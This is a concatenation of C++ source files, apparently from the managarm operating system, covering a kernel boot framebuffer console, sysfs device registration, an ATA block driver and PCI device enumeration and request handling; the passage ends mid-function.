#include <hw.frigg_pb.hpp>
extern uint8_t fontBitmap[];
namespace thor {
// ------------------------------------------------------------------------
// window handling
// ------------------------------------------------------------------------
constexpr size_t fontHeight = 16;
constexpr size_t fontWidth = 8;
constexpr uint32_t rgb(int r, int g, int b) {
return (r << 16) | (g << 8) | b;
}
constexpr uint32_t rgbColor[16] = {
rgb(1, 1, 1),
rgb(222, 56, 43),
rgb(57, 181, 74),
rgb(255, 199, 6),
rgb(0, 111, 184),
rgb(118, 38, 113),
rgb(44, 181, 233),
rgb(204, 204, 204),
rgb(128, 128, 128),
rgb(255, 0, 0),
rgb(0, 255, 0),
rgb(255, 255, 0),
rgb(0, 0, 255),
rgb(255, 0, 255),
rgb(0, 255, 255),
rgb(255, 255, 255)
};
constexpr uint32_t defaultBg = rgb(16, 16, 16);
struct FbDisplay : TextDisplay {
FbDisplay(void *ptr, unsigned int width, unsigned int height, size_t pitch)
: _width{width}, _height{height}, _pitch{pitch / sizeof(uint32_t)} {
assert(!(pitch % sizeof(uint32_t)));
setWindow(ptr);
_clearScreen(defaultBg);
}
void setWindow(void *ptr) {
_window = reinterpret_cast<uint32_t *>(ptr);
}
int getWidth() override;
int getHeight() override;
void setChars(unsigned int x, unsigned int y,
const char *c, int count, int fg, int bg) override;
void setBlanks(unsigned int x, unsigned int y, int count, int bg) override;
private:
void _clearScreen(uint32_t rgb_color);
volatile uint32_t *_window;
unsigned int _width;
unsigned int _height;
size_t _pitch;
};
int FbDisplay::getWidth() {
return _width / fontWidth;
}
int FbDisplay::getHeight() {
return _height / fontHeight;
}
void FbDisplay::setChars(unsigned int x, unsigned int y,
const char *c, int count, int fg, int bg) {
auto fg_rgb = rgbColor[fg];
auto bg_rgb = (bg < 0) ? defaultBg : rgbColor[bg];
auto dest_line = _window + y * fontHeight * _pitch + x * fontWidth;
for(size_t i = 0; i < fontHeight; i++) {
auto dest = dest_line;
for(int k = 0; k < count; k++) {
auto dc = (c[k] >= 32 && c[k] <= 127) ? c[k] : 127;
auto fontbits = fontBitmap[(dc - 32) * fontHeight + i];
for(size_t j = 0; j < fontWidth; j++) {
int bit = (1 << ((fontWidth - 1) - j));
*dest++ = (fontbits & bit) ? fg_rgb : bg_rgb;
}
}
dest_line += _pitch;
}
}
void FbDisplay::setBlanks(unsigned int x, unsigned int y, int count, int bg) {
auto bg_rgb = (bg < 0) ? defaultBg : rgbColor[bg];
auto dest_line = _window + y * fontHeight * _pitch + x * fontWidth;
for(size_t i = 0; i < fontHeight; i++) {
auto dest = dest_line;
for(int k = 0; k < count; k++) {
for(size_t j = 0; j < fontWidth; j++)
*dest++ = bg_rgb;
}
dest_line += _pitch;
}
}
void FbDisplay::_clearScreen(uint32_t rgb_color) {
auto dest_line = _window;
for(size_t i = 0; i < _height; i++) {
auto dest = dest_line;
for(size_t j = 0; j < _width; j++)
*dest++ = rgb_color;
dest_line += _pitch;
}
}
namespace {
frigg::LazyInitializer<FbInfo> bootInfo;
frigg::LazyInitializer<FbDisplay> bootDisplay;
frigg::LazyInitializer<BootScreen> bootScreen;
}
void initializeBootFb(uint64_t address, uint64_t pitch, uint64_t width,
uint64_t height, uint64_t bpp, uint64_t type, void *early_window) {
bootInfo.initialize();
auto fb_info = bootInfo.get();
fb_info->address = address;
fb_info->pitch = pitch;
fb_info->width = width;
fb_info->height = height;
fb_info->bpp = bpp;
fb_info->type = type;
// Initialize the framebuffer with a lower-half window.
bootDisplay.initialize(early_window,
fb_info->width, fb_info->height, fb_info->pitch);
bootScreen.initialize(bootDisplay.get());
enableLogHandler(bootScreen.get());
}
void transitionBootFb() {
auto window_size = (bootInfo->height * bootInfo->pitch + (kPageSize - 1)) & ~(kPageSize - 1);
assert(window_size <= 0x1'000'000);
auto window = KernelVirtualMemory::global().allocate(0x1'000'000);
for(size_t pg = 0; pg < window_size; pg += kPageSize)
KernelPageSpace::global().mapSingle4k(VirtualAddr(window) + pg,
bootInfo->address + pg, page_access::write, CachingMode::writeCombine);
// Transition to the kernel mapping window.
bootDisplay->setWindow(window);
assert(!(bootInfo->address & (kPageSize - 1)));
bootInfo->memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
bootInfo->address & ~(kPageSize - 1),
(bootInfo->height * bootInfo->pitch + (kPageSize - 1)) & ~(kPageSize - 1),
CachingMode::writeCombine);
// Try to attached the framebuffer to a PCI device.
pci::PciDevice *owner = nullptr;
for(auto it = pci::allDevices->begin(); it != pci::allDevices->end(); ++it) {
auto checkBars = [&] () -> bool {
for(int i = 0; i < 6; i++) {
if((*it)->bars[i].type != pci::PciDevice::kBarMemory)
continue;
// TODO: Careful about overflow here.
auto bar_begin = (*it)->bars[i].address;
auto bar_end = (*it)->bars[i].address + (*it)->bars[i].length;
if(bootInfo->address >= bar_begin
&& bootInfo->address + bootInfo->height * bootInfo->pitch <= bar_end)
return true;
}
return false;
};
if(checkBars()) {
assert(!owner);
owner = it->get();
}
}
if(!owner)
frigg::panicLogger() << "thor: Could not find owner for boot framebuffer" << frigg::endLog;
frigg::infoLogger() << "thor: Boot framebuffer is attached to PCI device "
<< owner->bus << "." << owner->slot << "." << owner->function << frigg::endLog;
owner->associatedFrameBuffer = bootInfo.get();
owner->associatedScreen = bootScreen.get();
}
} // namespace thor
<file_sep>
#include <linux/netlink.h>
#include <sstream>
#include "drvcore.hpp"
#include "nl-socket.hpp"
namespace drvcore {
std::shared_ptr<sysfs::Object> globalDevicesObject;
std::shared_ptr<sysfs::Object> globalClassObject;
std::shared_ptr<sysfs::Object> globalCharObject;
std::shared_ptr<sysfs::Object> globalBlockObject;
std::shared_ptr<sysfs::Object> inputClassObject;
std::shared_ptr<sysfs::Object> cardObject;
sysfs::Object *devicesObject() {
assert(globalDevicesObject);
return globalDevicesObject.get();
}
sysfs::Object *classObject() {
assert(globalClassObject);
return globalClassObject.get();
}
struct Card0UeventAttribute : sysfs::Attribute {
static auto singleton() {
static Card0UeventAttribute attr;
return &attr;
}
private:
Card0UeventAttribute()
: sysfs::Attribute("uevent", true) { }
public:
virtual COFIBER_ROUTINE(async::result<std::string>, show(sysfs::Object *object) override, ([=] {
assert(object == cardObject.get());
COFIBER_RETURN(std::string{"DEVNAME=dri/card0\n"});
}))
};
struct UeventAttribute : sysfs::Attribute {
static auto singleton() {
static UeventAttribute attr;
return &attr;
}
private:
UeventAttribute()
: sysfs::Attribute("uevent", true) { }
public:
virtual COFIBER_ROUTINE(async::result<std::string>, show(sysfs::Object *object) override, ([=] {
auto device = static_cast<Device *>(object);
std::stringstream ss;
if(auto unix_dev = device->unixDevice(); unix_dev) {
auto node_path = unix_dev->nodePath();
if(!node_path.empty())
ss << "DEVNAME=" << node_path << '\n';
ss << "MAJOR=" << unix_dev->getId().first << '\n';
ss << "MINOR=" << unix_dev->getId().second << '\n';
}
COFIBER_RETURN(ss.str());
}))
};
//-----------------------------------------------------------------------------
// Device implementation.
//-----------------------------------------------------------------------------
Device::Device(std::shared_ptr<Device> parent, std::string name, UnixDevice *unix_device)
: sysfs::Object{parent ? parent : globalDevicesObject, std::move(name)},
_unixDevice{unix_device} { }
//-----------------------------------------------------------------------------
// Free functions.
//-----------------------------------------------------------------------------
void initialize() {
nl_socket::configure(NETLINK_KOBJECT_UEVENT, 32);
// Create the /sys/dev/{char,block} directories.
auto dev_object = std::make_shared<sysfs::Object>(nullptr, "dev");
globalCharObject = std::make_shared<sysfs::Object>(dev_object, "char");
globalBlockObject = std::make_shared<sysfs::Object>(dev_object, "block");
// Create the global /sys/{devices,class,dev} directories.
globalDevicesObject = std::make_shared<sysfs::Object>(nullptr, "devices");
globalClassObject = std::make_shared<sysfs::Object>(nullptr, "class");
globalDevicesObject->addObject();
globalClassObject->addObject();
dev_object->addObject();
globalCharObject->addObject(); // TODO: Do this before dev_object is visible.
globalBlockObject->addObject();
cardObject = std::make_shared<sysfs::Object>(globalDevicesObject, "card0");
cardObject->addObject();
cardObject->realizeAttribute(Card0UeventAttribute::singleton());
auto drm_object = std::make_shared<sysfs::Object>(globalClassObject, "drm");
drm_object->addObject();
drm_object->createSymlink("card0", cardObject);
inputClassObject = std::make_shared<sysfs::Object>(globalClassObject, "input");
inputClassObject->addObject();
}
void installDevice(std::shared_ptr<Device> device) {
device->addObject();
// TODO: Do this before the object becomes visible in sysfs.
device->realizeAttribute(UeventAttribute::singleton());
device->createSymlink("subsystem", inputClassObject);
inputClassObject->createSymlink(device->name(), device);
if(auto unix_dev = device->unixDevice(); unix_dev) {
std::stringstream id_ss;
id_ss << unix_dev->getId().first << ":" << unix_dev->getId().second;
assert(unix_dev->type() == VfsType::charDevice);
globalCharObject->createSymlink(id_ss.str(), device);
}
}
void emitHotplug(std::string buffer) {
nl_socket::broadcast(NETLINK_KOBJECT_UEVENT, 1, std::move(buffer));
}
} // namespace drvcore
<file_sep>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <iostream>
#include <queue>
#include <async/result.hpp>
#include <arch/io_space.hpp>
#include <arch/register.hpp>
#include <helix/ipc.hpp>
#include <blockfs.hpp>
namespace {
constexpr bool logIrqs = false;
constexpr bool logRequests = false;
}
// --------------------------------------------------------
// Controller class
// --------------------------------------------------------
namespace regs {
inline constexpr arch::scalar_register<uint16_t> inData{0};
inline constexpr arch::scalar_register<uint8_t> inStatus{7};
inline constexpr arch::scalar_register<uint8_t> outSectorCount{2};
inline constexpr arch::scalar_register<uint8_t> outLba1{3};
inline constexpr arch::scalar_register<uint8_t> outLba2{4};
inline constexpr arch::scalar_register<uint8_t> outLba3{5};
inline constexpr arch::scalar_register<uint8_t> outDevice{6};
inline constexpr arch::scalar_register<uint8_t> outCommand{7};
}
namespace alt_regs {
inline constexpr arch::scalar_register<uint8_t> inStatus{0};
}
class Controller : public blockfs::BlockDevice {
public:
Controller();
public:
void run();
private:
cofiber::no_future _handleIrqs();
public:
async::result<void> readSectors(uint64_t sector, void *buffer,
size_t num_sectors) override;
private:
void _performRequest();
private:
enum Commands {
kCommandReadSectorsExt = 0x24
};
enum Flags {
kStatusErr = 0x01,
kStatusDrq = 0x08,
kStatusDf = 0x20,
kStatusRdy = 0x60,
kStatusBsy = 0x80,
kDeviceSlave = 0x10,
kDeviceLba = 0x40
};
struct Request {
uint64_t sector;
size_t numSectors;
size_t sectorsRead;
void *buffer;
async::promise<void> promise;
};
std::queue<Request> _requestQueue;
helix::UniqueDescriptor _irq;
HelHandle _ioHandle;
arch::io_space _ioSpace;
arch::io_space _altSpace;
bool _inRequest;
};
Controller::Controller()
: BlockDevice{512}, _ioSpace{0x1F0}, _altSpace{0x3F6}, _inRequest{false} {
HelHandle irq_handle;
HEL_CHECK(helAccessIrq(14, &irq_handle));
_irq = helix::UniqueDescriptor{irq_handle};
uintptr_t ports[] = { 0x1F0, 0x1F1, 0x1F2, 0x1F3, 0x1F4, 0x1F5, 0x1F6, 0x1F7, 0x3F6 };
HEL_CHECK(helAccessIo(ports, 9, &_ioHandle));
HEL_CHECK(helEnableIo(_ioHandle));
}
void Controller::run() {
_handleIrqs();
blockfs::runDevice(this);
}
COFIBER_ROUTINE(cofiber::no_future, Controller::_handleIrqs(), ([=] {
uint64_t sequence = 0;
while(true) {
if(logIrqs)
std::cout << "block-ata: Awaiting IRQ." << std::endl;
helix::AwaitEvent await_irq;
auto &&submit = helix::submitAwaitEvent(_irq, &await_irq, sequence,
helix::Dispatcher::global());
COFIBER_AWAIT submit.async_wait();
HEL_CHECK(await_irq.error());
sequence = await_irq.sequence();
if(logIrqs)
std::cout << "block-ata: IRQ fired." << std::endl;
// Check if the device is ready without clearing the IRQ.
auto status = _altSpace.load(alt_regs::inStatus);
if(status & kStatusBsy) {
HEL_CHECK(helAcknowledgeIrq(_irq.getHandle(), kHelAckNack, sequence));
continue;
}
assert(!(status & (kStatusErr | kStatusDf)));
assert(status & kStatusRdy);
assert(status & kStatusDrq);
// Clear and acknowledge the IRQ.
auto cleared = _ioSpace.load(regs::inStatus);
HEL_CHECK(helAcknowledgeIrq(_irq.getHandle(), kHelAckAcknowledge, sequence));
assert(!(cleared & (kStatusErr | kStatusDf)));
assert(cleared & kStatusRdy);
assert(cleared & kStatusDrq);
status = cleared;
assert(_inRequest);
assert(!_requestQueue.empty());
auto request = &_requestQueue.front();
auto dest = reinterpret_cast<uint8_t *>(request->buffer)
+ request->sectorsRead * 512;
for(int i = 0; i < 256; i++) {
// TODO: Be careful with endianess here.
uint16_t data = _ioSpace.load(regs::inData);
memcpy(dest + 2 * i, &data, sizeof(uint16_t));
}
request->sectorsRead++;
assert(request->sectorsRead <= request->numSectors);
if(request->sectorsRead == request->numSectors) {
if(logRequests)
std::cout << "block-ata: Reading from " << request->sector
<< " complete" << std::endl;
request->promise.set_value();
_requestQueue.pop();
_inRequest = false;
if(!_requestQueue.empty())
_performRequest();
}
}
}))
async::result<void> Controller::readSectors(uint64_t sector, void *buffer, size_t num_sectors) {
_requestQueue.emplace();
auto request = &_requestQueue.back();
request->sector = sector;
request->numSectors = num_sectors;
request->sectorsRead = 0;
request->buffer = buffer;
auto future = request->promise.async_get();
if(!_inRequest)
_performRequest();
return future;
}
void Controller::_performRequest() {
assert(!_inRequest);
_inRequest = true;
assert(!_requestQueue.empty());
auto request = &_requestQueue.front();
if(logRequests)
std::cout << "block-ata: Reading " << request->numSectors
<< " sectors from " << request->sector << std::endl;
assert(!(request->sector & ~((size_t(1) << 48) - 1)));
_ioSpace.store(regs::outDevice, kDeviceLba);
// TODO: There should be a delay after drive selection.
_ioSpace.store(regs::outSectorCount, (request->numSectors >> 8) & 0xFF);
_ioSpace.store(regs::outLba1, (request->sector >> 24) & 0xFF);
_ioSpace.store(regs::outLba2, (request->sector >> 32) & 0xFF);
_ioSpace.store(regs::outLba3, (request->sector >> 40) & 0xFF);
_ioSpace.store(regs::outSectorCount, request->numSectors & 0xFF);
_ioSpace.store(regs::outLba1, request->sector & 0xFF);
_ioSpace.store(regs::outLba2, (request->sector >> 8) & 0xFF);
_ioSpace.store(regs::outLba3, (request->sector >> 16) & 0xFF);
_ioSpace.store(regs::outCommand, kCommandReadSectorsExt);
}
Controller globalController;
// --------------------------------------------------------
// main() function
// --------------------------------------------------------
int main() {
printf("block-ata: Starting driver\n");
{
async::queue_scope scope{helix::globalQueue()};
globalController.run();
}
helix::globalQueue()->run();
}
<file_sep>#ifndef POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
#define POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
#include <cofiber.hpp>
namespace block_subsystem {
cofiber::no_future run();
} // namespace block_subsystem
#endif // POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
<file_sep>#ifndef POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
#define POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
#include <cofiber.hpp>
namespace drm_subsystem {
cofiber::no_future run();
} // namespace drm_subsystem
#endif // POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
<file_sep>
#include <algorithm>
#include <frigg/debug.hpp>
#include <hw.frigg_pb.hpp>
#include <mbus.frigg_pb.hpp>
#include "../../arch/x86/pic.hpp"
#include "../../generic/fiber.hpp"
#include "../../generic/io.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../generic/service_helpers.hpp"
#include "../../generic/usermem.hpp"
#include "../boot-screen.hpp"
#include "pci.hpp"
namespace thor {
// TODO: Move this to a header file.
extern frigg::LazyInitializer<LaneHandle> mbusClient;
namespace pci {
frigg::LazyInitializer<frigg::Vector<frigg::SharedPtr<PciDevice>, KernelAlloc>> allDevices;
namespace {
bool handleReq(LaneHandle lane, frigg::SharedPtr<PciDevice> device) {
auto branch = fiberAccept(lane);
if(!branch)
return false;
auto buffer = fiberRecv(branch);
managarm::hw::CntRequest<KernelAlloc> req(*kernelAlloc);
req.ParseFromArray(buffer.data(), buffer.size());
if(req.req_type() == managarm::hw::CntReqType::GET_PCI_INFO) {
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
for(size_t i = 0; i < device->caps.size(); i++) {
managarm::hw::PciCapability<KernelAlloc> msg(*kernelAlloc);
msg.set_type(device->caps[i].type);
msg.set_offset(device->caps[i].offset);
msg.set_length(device->caps[i].length);
resp.add_capabilities(std::move(msg));
}
for(size_t k = 0; k < 6; k++) {
managarm::hw::PciBar<KernelAlloc> msg(*kernelAlloc);
if(device->bars[k].type == PciDevice::kBarIo) {
assert(device->bars[k].offset == 0);
msg.set_io_type(managarm::hw::IoType::PORT);
msg.set_address(device->bars[k].address);
msg.set_length(device->bars[k].length);
}else if(device->bars[k].type == PciDevice::kBarMemory) {
msg.set_io_type(managarm::hw::IoType::MEMORY);
msg.set_address(device->bars[k].address);
msg.set_length(device->bars[k].length);
msg.set_offset(device->bars[k].offset);
}else{
assert(device->bars[k].type == PciDevice::kBarNone);
msg.set_io_type(managarm::hw::IoType::NO_BAR);
}
resp.add_bars(std::move(msg));
}
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_BAR) {
auto index = req.index();
AnyDescriptor descriptor;
if(device->bars[index].type == PciDevice::kBarIo) {
descriptor = IoDescriptor{device->bars[index].io};
}else{
assert(device->bars[index].type == PciDevice::kBarMemory);
descriptor = MemoryViewDescriptor{device->bars[index].memory};
}
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
fiberPushDescriptor(branch, descriptor);
}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_IRQ) {
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
assert(device->interrupt);
auto object = frigg::makeShared<IrqObject>(*kernelAlloc,
frigg::String<KernelAlloc>{*kernelAlloc, "pci-irq."}
+ frigg::to_string(*kernelAlloc, device->bus)
+ frigg::String<KernelAlloc>{*kernelAlloc, "-"}
+ frigg::to_string(*kernelAlloc, device->slot)
+ frigg::String<KernelAlloc>{*kernelAlloc, "-"}
+ frigg::to_string(*kernelAlloc, device->function));
IrqPin::attachSink(device->interrupt, object.get());
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
fiberPushDescriptor(branch, IrqDescriptor{object});
}else if(req.req_type() == managarm::hw::CntReqType::CLAIM_DEVICE) {
if(device->associatedScreen) {
frigg::infoLogger() << "thor: Disabling screen associated with PCI device "
<< device->bus << "." << device->slot << "." << device->function
<< frigg::endLog;
disableLogHandler(device->associatedScreen);
}
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::BUSIRQ_ENABLE) {
auto command = readPciHalf(device->bus, device->slot, device->function, kPciCommand);
writePciHalf(device->bus, device->slot, device->function,
kPciCommand, command & ~uint16_t{0x400});
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::LOAD_PCI_SPACE) {
// TODO: Perform some sanity checks on the offset.
uint32_t word;
if(req.size() == 1) {
word = readPciByte(device->bus, device->slot, device->function, req.offset());
}else if(req.size() == 2) {
word = readPciHalf(device->bus, device->slot, device->function, req.offset());
}else{
assert(req.size() == 4);
word = readPciWord(device->bus, device->slot, device->function, req.offset());
}
managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
resp.set_error(managarm::hw::Errors::SUCCESS);
resp.set_word(word);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::STORE_PCI_SPACE) {
// TODO: Perform some sanity checks on the offset.
if(req.size() == 1) {
writePciByte(device->bus, device->slot, device->function, req.offset(), req.word());
}else if(req.size() == 2) {
writePciHalf(device->bus, device->slot, device->function, req.offset(), req.word());
}else{
assert(req.size() == 4);
writePciWord(device->bus, device->slot, device->function, req.offset(), req.word());
}
managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
resp.set_error(managarm::hw::Errors::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::LOAD_PCI_CAPABILITY) {
assert(req.index() < device->caps.size());
// TODO: Perform some sanity checks on the offset.
uint32_t word;
if(req.size() == 1) {
word = readPciByte(device->bus, device->slot, device->function,
device->caps[req.index()].offset + req.offset());
}else if(req.size() == 2) {
word = readPciHalf(device->bus, device->slot, device->function,
device->caps[req.index()].offset + req.offset());
}else{
assert(req.size() == 4);
word = readPciWord(device->bus, device->slot, device->function,
device->caps[req.index()].offset + req.offset());
}
managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
resp.set_error(managarm::hw::Errors::SUCCESS);
resp.set_word(word);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::GET_FB_INFO) {
auto fb = device->associatedFrameBuffer;
assert(fb);
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
resp.set_fb_pitch(fb->pitch);
resp.set_fb_width(fb->width);
resp.set_fb_height(fb->height);
resp.set_fb_bpp(fb->bpp);
resp.set_fb_type(fb->type);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_FB_MEMORY) {
auto fb = device->associatedFrameBuffer;
assert(fb);
MemoryViewDescriptor descriptor{fb->memory};
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
fiberPushDescriptor(branch, descriptor);
}else{
managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::hw::Errors::ILLEGAL_REQUEST);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
}
return true;
}
// ------------------------------------------------------------------------
// mbus object creation and management.
// ------------------------------------------------------------------------
LaneHandle createObject(LaneHandle mbus_lane, frigg::SharedPtr<PciDevice> device) {
auto branch = fiberOffer(mbus_lane);
managarm::mbus::Property<KernelAlloc> vendor_prop(*kernelAlloc);
vendor_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-vendor"));
auto &vendor_item = vendor_prop.mutable_item().mutable_string_item();
vendor_item.set_value(frigg::to_string(*kernelAlloc, device->vendor, 16, 4));
managarm::mbus::Property<KernelAlloc> dev_prop(*kernelAlloc);
dev_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-device"));
auto &dev_item = dev_prop.mutable_item().mutable_string_item();
dev_item.set_value(frigg::to_string(*kernelAlloc, device->deviceId, 16, 4));
managarm::mbus::Property<KernelAlloc> rev_prop(*kernelAlloc);
rev_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-revision"));
auto &rev_item = rev_prop.mutable_item().mutable_string_item();
rev_item.set_value(frigg::to_string(*kernelAlloc, device->revision, 16, 2));
managarm::mbus::Property<KernelAlloc> class_prop(*kernelAlloc);
class_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-class"));
auto &class_item = class_prop.mutable_item().mutable_string_item();
class_item.set_value(frigg::to_string(*kernelAlloc, device->classCode, 16, 2));
managarm::mbus::Property<KernelAlloc> subclass_prop(*kernelAlloc);
subclass_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-subclass"));
auto &subclass_item = subclass_prop.mutable_item().mutable_string_item();
subclass_item.set_value(frigg::to_string(*kernelAlloc, device->subClass, 16, 2));
managarm::mbus::Property<KernelAlloc> if_prop(*kernelAlloc);
if_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-interface"));
auto &if_item = if_prop.mutable_item().mutable_string_item();
if_item.set_value(frigg::to_string(*kernelAlloc, device->interface, 16, 2));
managarm::mbus::CntRequest<KernelAlloc> req(*kernelAlloc);
req.set_req_type(managarm::mbus::CntReqType::CREATE_OBJECT);
req.set_parent_id(1);
req.add_properties(std::move(vendor_prop));
req.add_properties(std::move(dev_prop));
req.add_properties(std::move(rev_prop));
req.add_properties(std::move(class_prop));
req.add_properties(std::move(subclass_prop));
req.add_properties(std::move(if_prop));
if(device->associatedFrameBuffer) {
managarm::mbus::Property<KernelAlloc> cls_prop(*kernelAlloc);
cls_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "class"));
auto &cls_item = cls_prop.mutable_item().mutable_string_item();
cls_item.set_value(frigg::String<KernelAlloc>(*kernelAlloc, "framebuffer"));
req.add_properties(std::move(cls_prop));
}
frigg::String<KernelAlloc> ser(*kernelAlloc);
req.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
auto buffer = fiberRecv(branch);
managarm::mbus::SvrResponse<KernelAlloc> resp(*kernelAlloc);
resp.ParseFromArray(buffer.data(), buffer.size());
assert(resp.error() == managarm::mbus::Error::SUCCESS);
auto descriptor = fiberPullDescriptor(branch);
assert(descriptor.is<LaneDescriptor>());
return descriptor.get<LaneDescriptor>().handle;
}
void handleBind(LaneHandle object_lane, frigg::SharedPtr<PciDevice> device) {
auto branch = fiberAccept(object_lane);
assert(branch);
auto buffer = fiberRecv(branch);
managarm::mbus::SvrRequest<KernelAlloc> req(*kernelAlloc);
req.ParseFromArray(buffer.data(), buffer.size());
assert(req.req_type() == managarm::mbus::SvrReqType::BIND);
managarm::mbus::CntResponse<KernelAlloc> resp(*kernelAlloc);
resp.set_error(managarm::mbus::Error::SUCCESS);
frigg::String<KernelAlloc> ser(*kernelAlloc);
resp.SerializeToString(&ser);
fiberSend(branch, ser.data(), ser.size());
auto stream = createStream();
fiberPushDescriptor(branch, LaneDescriptor{stream.get<1>()});
// TODO: Do this in an own fiber.
KernelFiber::run([lane = stream.get<0>(), device] () {
while(true) {
if(!handleReq(lane, device))
break;
}
});
}
}
void runDevice(frigg::SharedPtr<PciDevice> device) {
KernelFiber::run([=] {
auto object_lane = createObject(*mbusClient, device);
while(true)
handleBind(object_lane, device);
});
}
// --------------------------------------------------------
// Discovery functionality
// --------------------------------------------------------
size_t computeBarLength(uintptr_t mask) {
static_assert(sizeof(long) == 8, "Fix builtin usage");
static_assert(sizeof(uintptr_t) == 8, "Fix builtin usage");
assert(mask);
size_t length_bits = __builtin_ctzl(mask);
size_t decoded_bits = 64 - __builtin_clzl(mask);
//FIXME: assert(__builtin_popcountl(mask) == decoded_bits - length_bits);
return size_t(1) << length_bits;
}
//FIXME: std::queue<unsigned int> enumerationQueue;
IrqPin *resolveRoute(const RoutingInfo &info, unsigned int slot, IrqIndex index) {
auto entry = std::find_if(info.begin(), info.end(), [&] (const auto &ref) {
return ref.slot == slot && ref.index == index;
});
assert(entry != info.end());
assert(entry->pin);
return entry->pin;
}
void checkPciFunction(uint32_t bus, uint32_t slot, uint32_t function,
const RoutingInfo &routing) {
uint16_t vendor = readPciHalf(bus, slot, function, kPciVendor);
if(vendor == 0xFFFF)
return;
uint8_t header_type = readPciByte(bus, slot, function, kPciHeaderType);
if((header_type & 0x7F) == 0) {
frigg::infoLogger() << " Function " << function << ": Device";
}else if((header_type & 0x7F) == 1) {
uint8_t secondary = readPciByte(bus, slot, function, kPciBridgeSecondary);
frigg::infoLogger() << " Function " << function
<< ": PCI-to-PCI bridge to bus " << (int)secondary;
//FIXME: enumerationQueue.push(secondary);
}else{
frigg::infoLogger() << " Function " << function
<< ": Unexpected PCI header type " << (header_type & 0x7F);
}
auto command = readPciHalf(bus, slot, function, kPciCommand);
if(command & 0x01)
frigg::infoLogger() << " (Decodes IO)";
if(command & 0x02)
frigg::infoLogger() << " (Decodes Memory)";
if(command & 0x04)
frigg::infoLogger() << " (Busmaster)";
if(command & 0x400)
frigg::infoLogger() << " (IRQs masked)";
frigg::infoLogger() << frigg::endLog;
writePciHalf(bus, slot, function, kPciCommand, command | 0x400);
auto device_id = readPciHalf(bus, slot, function, kPciDevice);
auto revision = readPciByte(bus, slot, function, kPciRevision);
auto class_code = readPciByte(bus, slot, function, kPciClassCode);
auto sub_class = readPciByte(bus, slot, function, kPciSubClass);
auto interface = readPciByte(bus, slot, function, kPciInterface);
frigg::infoLogger() << " Vendor/device: " << frigg::logHex(vendor)
<< "." << frigg::logHex(device_id) << "." << frigg::logHex(revision)
<< ", class: " << frigg::logHex(class_code)
<< "." << frigg::logHex(sub_class)
<< "." << frigg::logHex(interface) << frigg::endLog;
if((header_type & 0x7F) == 0) {
// uint16_t subsystem_vendor = readPciHalf(bus, slot, function, kPciRegularSubsystemVendor);
// uint16_t subsystem_device = readPciHalf(bus, slot, function, kPciRegularSubsystemDevice);
// frigg::infoLogger() << " Subsystem vendor: 0x" << frigg::logHex(subsystem_vendor)
